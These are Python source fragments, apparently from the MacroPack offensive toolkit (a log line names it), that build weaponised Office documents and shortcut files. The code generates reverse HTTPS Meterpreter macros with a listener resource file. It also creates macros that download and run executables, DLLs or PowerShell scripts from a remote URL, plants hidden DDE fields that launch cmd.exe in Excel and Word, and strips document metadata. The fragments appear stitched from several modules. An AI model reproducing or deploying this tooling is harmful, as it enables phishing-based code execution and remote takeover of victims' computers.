def _processWebMeterTemplate(self):
"""
Generate reverse https meterpreter template for VBA and VBS based
"""
paramArray = [MPParam("rhost"), MPParam("rport")]
self.fillInputParams(paramArray)
content = vbLib.templates.WEBMETER
content = content.replace("<<<RHOST>>>",
getParamValue(paramArray, "rhost"))
content = content.replace("<<<RPORT>>>",
getParamValue(paramArray, "rport"))
content = content + vbLib.WebMeter.VBA
vbaFile = self.addVBAModule(content)
logging.debug(" [-] Template %s VBA generated in %s" %
(self.template, vbaFile))
rc_content = vbLib.templates.WEBMETER_RC
rc_content = rc_content.replace("<<<LHOST>>>",
getParamValue(paramArray, "rhost"))
rc_content = rc_content.replace("<<<LPORT>>>",
getParamValue(paramArray, "rport"))
# Write in RC file
rcFilePath = os.path.join(os.path.dirname(self.outputFilePath),
"webmeter.rc")
f = open(rcFilePath, 'w')
f.writelines(rc_content)
f.close()
logging.info(" [-] Meterpreter resource file generated in %s" %
rcFilePath)
logging.info(" [-] Execute listener with 'msfconsole -r %s'" %
rcFilePath)
logging.info(" [-] OK!")
def _processDropper2Template(self):
""" Generate DROPPER2 template for VBA and VBS based """
# Get required parameters
realPathKey = "File name in TEMP or full file path (environment variables can be used)."
paramArray = [
MPParam("target_url"),
MPParam(realPathKey, optional=True)
]
self.fillInputParams2(paramArray)
downloadPath = getParamValue(paramArray, realPathKey)
targetUrl = getParamValue(paramArray, "target_url")
# build target path
if downloadPath == "":
downloadPath = utils.randomAlpha(8) + os.path.splitext(
targetUrl)[1]
downloadPath = self._targetPathToVba(downloadPath)
# Add required functions
self.addVBLib(vbLib.WscriptExec)
self.addVBLib(vbLib.WmiExec)
self.addVBLib(vbLib.ExecuteCMDAsync)
content = vbLib.templates.DROPPER2
content = content.replace("<<<URL>>>", targetUrl)
content = content.replace("<<<DOWNLOAD_PATH>>>", downloadPath)
# generate random file name
vbaFile = self.addVBAModule(content)
logging.debug(" [-] Template %s VBA generated in %s" %
(self.template, vbaFile))
logging.info(" [-] OK!")
def _processDropperDllTemplate(self):
paramArray = [MPParam("URL"), MPParam("Dll_Function")]
self.fillInputParams(paramArray)
dllUrl = getParamValue(paramArray, "URL")
dllFct = getParamValue(paramArray, "Dll_Function")
if self.outputFileType in [
MSTypes.HTA, MSTypes.VBS, MSTypes.WSF, MSTypes.SCT, MSTypes.XSL
]:
# for VBS based file
content = vbLib.templates.DROPPER_DLL_VBS
content = content.replace("<<<DLL_URL>>>", dllUrl)
content = content.replace("<<<DLL_FUNCTION>>>", dllFct)
vbaFile = self.addVBAModule(content)
logging.debug(" [-] Template %s VBS generated in %s" %
(self.template, vbaFile))
else:
# generate main module
content = vbLib.templates.DROPPER_DLL2
content = content.replace("<<<DLL_FUNCTION>>>", dllFct)
invokerModule = self.addVBAModule(content)
logging.debug(" [-] Template %s VBA generated in %s" %
(self.template, invokerModule))
# second module
content = vbLib.templates.DROPPER_DLL1
content = content.replace("<<<DLL_URL>>>", dllUrl)
if MSTypes.XL in self.outputFileType:
msApp = MSTypes.XL
elif MSTypes.WD in self.outputFileType:
msApp = MSTypes.WD
elif MSTypes.PPT in self.outputFileType:
msApp = "PowerPoint"
elif MSTypes.VSD in self.outputFileType:
msApp = "Visio"
elif MSTypes.MPP in self.outputFileType:
msApp = "Project"
else:
msApp = MSTypes.UNKNOWN
content = content.replace("<<<APPLICATION>>>", msApp)
content = content.replace(
"<<<MODULE_2>>>",
os.path.splitext(os.path.basename(invokerModule))[0])
vbaFile = self.addVBAModule(content)
logging.debug(
" [-] Second part of Template %s VBA generated in %s" %
(self.template, vbaFile))
logging.info(" [-] OK!")
def _processEmbedExeTemplate(self):
""" Drop and execute embedded file """
paramArray = [MPParam("Command line parameters", optional=True)]
self.fillInputParams2(paramArray)
# generate random file name
fileName = utils.randomAlpha(7) + os.path.splitext(
self.mpSession.embeddedFilePath)[1]
logging.info(" [-] File extraction path: %%temp%%\\%s" % fileName)
# Add required functions
self.addVBLib(vbLib.WscriptExec)
self.addVBLib(vbLib.WmiExec)
self.addVBLib(vbLib.ExecuteCMDAsync)
content = vbLib.templates.EMBED_EXE
content = content.replace("<<<FILE_NAME>>>", fileName)
if getParamValue(paramArray, "Command line parameters") != "":
content = content.replace(
"<<<PARAMETERS>>>", " & \" %s\"" %
getParamValue(paramArray, "Command line parameters"))
else:
content = content.replace("<<<PARAMETERS>>>", "")
vbaFile = self.addVBAModule(content)
logging.debug(" [-] Template %s VBA generated in %s" %
(self.template, vbaFile))
logging.info(" [-] OK!")
def check(self):
if not self.mpSession.htaMacro:
paramArray = [MPParam("Command line")]
self.fillInputParams(paramArray)
self.mpSession.dosCommand = getParamValue(paramArray,
"Command line")
return True
def _processEmbedDllTemplate(self):
# open file containing template values
paramArray = [MPParam("Dll_Function")]
self.fillInputParams(paramArray)
#logging.info(" [-] Dll will be dropped at: %s" % extractedFilePath)
if self.outputFileType in [MSTypes.VBSCRIPTS_FORMATS]:
# for VBS based file
content = vbLib.templates.EMBED_DLL_VBS
content = content.replace(
"<<<DLL_FUNCTION>>>", getParamValue(paramArray,
"Dll_Function"))
vbaFile = self.addVBAModule(content)
logging.debug(" [-] Template %s VBS generated in %s" %
(self.template, vbaFile))
else:
# for VBA based files
# generate main module
content = vbLib.templates.DROPPER_DLL2
content = content.replace(
"<<<DLL_FUNCTION>>>", getParamValue(paramArray,
"Dll_Function"))
invokerModule = self.addVBAModule(content)
logging.debug(" [-] Template %s VBA generated in %s" %
(self.template, invokerModule))
# second module
content = vbLib.templates.EMBED_DLL_VBA
if MSTypes.XL in self.outputFileType:
msApp = MSTypes.XL
elif MSTypes.WD in self.outputFileType:
msApp = MSTypes.WD
elif MSTypes.PPT in self.outputFileType:
msApp = "PowerPoint"
elif MSTypes.VSD in self.outputFileType:
msApp = "Visio"
elif MSTypes.MPP in self.outputFileType:
msApp = "Project"
else:
msApp = MSTypes.UNKNOWN
content = content.replace("<<<APPLICATION>>>", msApp)
content = content.replace(
"<<<MODULE_2>>>",
os.path.splitext(os.path.basename(invokerModule))[0])
vbaFile = self.addVBAModule(content)
logging.debug(
" [-] Second part of Template %s VBA generated in %s" %
(self.template, vbaFile))
logging.info(" [-] OK!")
def check(self):
self.targetPath = ""
dictKey = "Target path (.exe, .dll, .sct) or command line"
if not self.mpSession.htaMacro:
paramArray = [MPParam(dictKey)]
self.fillInputParams(paramArray)
if str(self.targetPath).lower().endswith(".dll"):
self.targetPath = getParamValue(paramArray, dictKey)
elif str(self.targetPath).lower().endswith(".sct"):
self.targetPath = getParamValue(paramArray, dictKey)
elif str(self.targetPath).lower().endswith(".exe"):
self.targetPath = getParamValue(paramArray, dictKey)
else:
self.mpSession.dosCommand = getParamValue(paramArray, dictKey)
return True
def check(self):
if sys.platform != "win32":
logging.error(
" [!] You have to run on Windows OS to build this file format."
)
return False
if not self.mpSession.htaMacro:
# Get needed parameters
paramArray = [MPParam("Command line")]
self.fillInputParams(paramArray)
self.mpSession.dosCommand = getParamValue(paramArray,
"Command line")
#workingDirectory = paramDict["Work_Directory"]
return True
def generate(self):
logging.info(" [+] Generating %s file..." % self.outputFileType)
paramArray = [MPParam("targetUrl")]
self.fillInputParams(paramArray)
# Fill template
urlContent = URL_TEMPLATE
urlContent = urlContent.replace("<<<URL>>>",
getParamValue(paramArray, "targetUrl"))
# Write in new SCF file
f = open(self.outputFilePath, 'w')
f.writelines(urlContent)
f.close()
logging.info(" [-] Generated URL file: %s" % self.outputFilePath)
logging.info(" [-] Test with : \n Click on %s file to test.\n" %
self.outputFilePath)
def generate(self):
logging.info(" [+] Generating %s file..." % self.outputFileType)
paramArray = [MPParam("targetUrl")]
self.fillInputParams(paramArray)
targetUrl = getParamValue(paramArray, "targetUrl")
# Complete template
glkContent = GLK_TEMPLATE
glkContent = glkContent.replace("<<<URL>>>", targetUrl)
# Write in new SCF file
f = open(self.outputFilePath, 'w')
f.writelines(glkContent)
f.close()
logging.info(" [-] Generated GLK file: %s" % self.outputFilePath)
logging.info(" [-] Test with : \n Click on %s file to test.\n" %
self.outputFilePath)
def _processCmdTemplate(self):
""" cmd execute template builder """
paramArray = [MPParam("Command line")]
self.fillInputParams(paramArray)
self.mpSession.dosCommand = getParamValue(paramArray, "Command line")
# add execution functions
self.addVBLib(vbLib.WscriptExec)
self.addVBLib(vbLib.WmiExec)
self.addVBLib(vbLib.ExecuteCMDAsync)
content = vbLib.templates.CMD
if self.mpSession.mpType == "Community":
content = content.replace("<<<CMDLINE>>>",
self.mpSession.dosCommand)
vbaFile = self.addVBAModule(content)
logging.info(" [-] Template %s VBA generated in %s" %
(self.template, vbaFile))
def _processPowershellDropperTemplate(self):
""" Generate code based on powershell DROPPER template """
# Get required parameters
paramArray = [MPParam("powershell_script_url")]
self.fillInputParams(paramArray)
# Add required functions
self.addVBLib(vbLib.WscriptExec)
self.addVBLib(vbLib.WmiExec)
self.addVBLib(vbLib.ExecuteCMDAsync)
content = vbLib.templates.DROPPER_PS
content = content.replace(
"<<<POWERSHELL_SCRIPT_URL>>>",
getParamValue(paramArray, "powershell_script_url"))
# generate random file name
vbaFile = self.addVBAModule(content)
logging.debug(" [-] Template %s VBA generated in %s" %
(self.template, vbaFile))
logging.info(" [-] OK!")
def generate(self):
logging.info(" [+] Generating %s file..." % self.outputFileType)
paramArray = [MPParam("targetUrl")]
self.fillInputParams(paramArray)
targetUrl = getParamValue(paramArray, "targetUrl")
# Fill template
content = LIBRARY_MS_TEMPLATE
content = content.replace("<<<TARGET>>>", targetUrl)
content = content.replace("<<<ICON>>>", self.mpSession.icon)
# Write in new SCF file
f = open(self.outputFilePath, 'w')
f.writelines(content)
f.close()
logging.info(" [-] Generated MS Library Shortcut file: %s" % self.outputFilePath)
logging.info(" [-] Test with : \n Click on %s file to test.\n" % self.outputFilePath)
def insertDDE(self):
logging.info(" [+] Include DDE attack...")
# Get command line
paramArray = [MPParam("Command line")]
self.fillInputParams(paramArray)
command = getParamValue(paramArray, "Command line")
logging.info(" [-] Open document...")
# open up an instance of Excel with the win32com driver\ \\
excel = win32com.client.Dispatch("Excel.Application")
#disable auto-open macros
secAutomation = excel.Application.AutomationSecurity
msoAutomationSecurityForceDisable = 3
excel.Application.AutomationSecurity = msoAutomationSecurityForceDisable
# do the operation in background without actually opening Excel
excel.Visible = False
workbook = excel.Workbooks.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!'A1'""" % command.rstrip(
)
excel.Cells(1, 26).Formula = ddeCmd
excel.Cells(1, 26).FormulaHidden = True
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll = 99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save Document...")
excel.DisplayAlerts = False
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
#reenable auto-open macros
excel.Application.AutomationSecurity = secAutomation
# garbage collection
del excel
def generate(self):
logging.info(" [+] Generating %s file..." % self.outputFileType)
paramArray = [MPParam("Command line")]
self.fillInputParams(paramArray)
# Fill template
content = SETTINGS_MS_TEMPLATE
content = content.replace("<<<CMD>>>",
getParamValue(paramArray, "Command line"))
content = content.replace("<<<ICON>>>", self.mpSession.icon)
# Write in new SCF file
f = open(self.outputFilePath, 'w')
f.writelines(content)
f.close()
logging.info(" [-] Generated Settings Shortcut file: %s" %
self.outputFilePath)
logging.info(" [-] Test with: Double click on %s file." %
self.outputFilePath)
logging.info(
" [!] The attack via SettingContent-ms has been patched as CVE-2018-8414. \n This payload is kept in MacroPack but its useless in offensive security scenario.\n"
)
def insertDDE(self):
logging.info(" [+] Include DDE attack...")
# Get command line
paramArray = [MPParam("Command line")]
self.fillInputParams(paramArray)
command = getParamValue(paramArray, "Command line")
logging.info(" [-] Open document...")
# open up an instance of Word with the win32com driver
word = win32com.client.Dispatch("Word.Application")
# do the operation in background without actually opening Excel
word.Visible = False
document = word.Documents.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r'"\"c:\\Program Files\\Microsoft Office\\MSWORD\\..\\..\\..\\windows\\system32\\cmd.exe\" /c %s" "."' % command.rstrip(
)
wdFieldDDEAuto = 46
document.Fields.Add(Range=word.Selection.Range,
Type=wdFieldDDEAuto,
Text=ddeCmd,
PreserveFormatting=False)
# save the document and close
word.DisplayAlerts = False
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
wdRDIAll = 99
document.RemoveDocumentInformation(wdRDIAll)
logging.info(" [-] Save Document...")
document.Save()
document.Close()
word.Application.Quit()
# garbage collection
del word